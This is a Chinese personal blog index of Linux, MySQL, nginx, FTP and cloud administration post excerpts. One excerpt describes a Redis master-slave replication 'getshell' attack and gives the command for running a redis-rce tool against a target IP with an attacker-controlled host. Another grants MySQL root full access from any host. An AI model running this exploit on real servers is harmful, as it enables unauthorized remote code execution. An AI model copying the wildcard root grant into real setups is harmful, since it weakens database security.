LeeZbug的博客

Linux系统下LVM新建和扩展逻辑卷，LVM在扩展性比其他的更方便

部分等保测评修改项，audit审计，密码复杂程度，

在使用数据库过程中，有时候会有需求需要获得数据库中有哪些表哪些字段的信息。可以使用以下SQL

备份单库[单表]:mysqldump -u username -p dbname [tbname ...] > filename.sql备份单库多表:mysqldump -u username -p dbname tbname1 tbname2... > filename.sql备份多库:mysqldump -u username -p --databases dbname1 dbname2 ... > filename.sql备份所有库:mysql

多实例启动就是不同配置文件启动mysql二进制文件直接启动mysql：1.下载对应版本二进制文件并解压下载地址：https://downloads.mysql.com/archives/get/p/23/file/mysql-5.7.35-linux-glibc2.12-x86_64.tar.gz本例下载版本为5.7.35这里可以下载其他版本：MySQL :: Download MySQL Community Server (Archived Versions)cd /opt

主从复制漏洞：参考文章：Redis主从复制getshell技巧 - Bypass - 博客园1.so和rce文件下载：GitHub - LeeZBug/redis-rce: Redis 4.x/5.x RCE下载后安装所需要的python库，pip install -r requirement.txt2.运行rcepython redis-rce.py -r [target_ip] -L [attack_ip] -a [redis_require_password] -f module

利用redis配置键的过期时间做到对客户端访问频率进行判断进行限制访问，放到access_by_lua_*阶段。具体代码如下：--Lua--定义关闭redis函数：local function close_redis(red) if not red then return end -- 释放连接(连接池实现)，毫秒 local pool_max_idle_time = 10000 -- 连接池大小 local pool_size =

强制跳转https# 根据访问的协议强制跳转if ($scheme = 'http'){rewrite ^/(.*)$ https://$host/$1 redirect;}# 根据访问的端口进行强制跳转if ($server_port = 80) { rewrite ^(.*)$ https://$host$1 permanent;}https监听# 一般放置在server块，https默认监听是443端口，需增加443端口监听listen 443 ssl;ss

一、安装启动FTP服务yum install vsftpd -y service vsftpd start netstat -nltp | grep 21二、FTP配置文件/etc/vsftpd/vsftpd.conf vsftpd.conf为主要配置文件 ftpusers配置禁止访问 FTP 服务器的用户列表 user_list配置用户访问控制，默认设置下为黑名单三、FTP本地用户最简配置问题一、本地用户使用/sbin/nologin作为shell后无法登录解决...

windows中的tracert使用的icmp，linux中使用的traceroute是udp报文和icmp返回（？？）windows为例：tracert 用法一般直接使用 tracert hostname[ip] 即可tracert baidu.comtracert 39.156.69.79需要快速完成命令可以不将地址解析成主机名并设置超时时间tracert -d -w 200 baidu.com第一列是条数，第2-4是每次返回的时延（每个地址会请求三...

编写python脚本调用阿里云SDK批量提取阿里云某region（如杭州）全部运行中实例的基本信息并生成表格。# author lizhejieimport jsonimport csvfrom aliyunsdkcore.client import AcsClientfrom aliyunsdkcore.acs_exception.exceptions import ClientExceptionfrom aliyunsdkcore.acs_exception.exceptions imp

问题现象：客户在云主机安全组上加入了20/21入规则，客户端可以连接FTP服务器，但是无法传输文件等。原因：默认FTP连接传输使用被动模式未使用主动模式，防火墙(安全组)未设置正确的出入站规则解决方法：关闭被动模式，使用主动模式；或者使用默认被动模式，服务端自定义较高的被动端口并加入新防火墙安全组规则关闭被动模式使用主动模式方法不同FTP版本不一样：再建立ftp连接以后，使用passive关闭/打开主动模式FTP只通过TCP连接,没有用于FTP的UDP组件.FTP不同于其他服务的是.

注意：1.某个keepalived服务所在的机器作为当前master时，是无法访问VIP的(crul VIP)2.出现脑裂会导致无法ping通VIP，脑裂是一种主被互相不能通信导致各自为政的情况1.环境配置：keepalived-master：192.168.8.8keepalived-backup：192.168.8.9nginx1：192.168.8.10nginx2：19...

记工作中的一次经验，由此客户有一台云主机 (linux) 不管怎么样都Ping不通。我就开始按照以下顺序开始排查：1.云上服务器是否处于运行状态，确认为运行状态，可能为安全组问题。2.确认云上安全组是否开通，发现没哟开通ICMP协议的安全组，给予开通。开通后仍无法成功ping通，可能是实例内配置问题。3.要求客户提供实例账号密码，进入系统。ping 114.114.11...

其实这教程也没更上时代了，fdisk这个命令有两个缺点：1.无法分区单个2TB以上的分区2.无法识别parted的GTP分区但是学会fdisk命令的分区步骤，相信你对parted命令分区也会很快的掌握教程中是使用自己虚拟机的，阿里云主机的话就是/dev/sdb改成/dev/vdb或者其他数据盘一.分区fdisk -l #查看分区状态。未分区的硬盘下的下方无分区信息...

mysql_secure_installation命令后的取消root远程登录选择N后还是不能用远程sqlyog登录。GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'password';FLUSH PRIVILEGES;上述语句允许root （'root'） 用户从任意主机（‘%’）用密码password （IDENTI...

import requestsheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi\ t/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'}url = 'http://www.renren.c...

这两天入门了一下docker和zabbix，做了两个意见安装脚本，太多的配置也还不是很会。但是都能保证安装上能正常运行。中间自己也遇到好多问题，zabbix还有个问题自己还很搞笑的弄错了。zabbix在安装连接数据库的时候总是报错，后来发现是数据库服务没启动，我一直用service mysql start想要启动mysql。后来才知道原来是现在的mysql已经改成mariadb，现...

sed命令的执行过程：按行读取文件到模式空间（临时缓存）并进行匹配，执行sed内的命令，从模式空间打印结果到屏幕。命令用法：sed [选项] [sed内置命令] [输入文件] 增删改查 a) 增 a 追加文本到指定行后 i 插入文本到指定行前 单行增加 ...